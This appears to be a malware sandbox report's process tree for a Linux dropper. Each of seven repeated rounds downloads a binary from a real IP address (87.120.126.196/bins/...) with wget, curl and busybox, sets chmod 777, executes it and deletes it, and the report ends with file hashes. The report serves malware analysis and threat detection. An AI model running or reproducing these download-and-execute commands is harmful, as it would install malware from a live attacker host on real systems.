/usr/bin/curlcurl -O http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:936
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:942
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:948
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:954
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:960
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:966
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:972
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:975
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97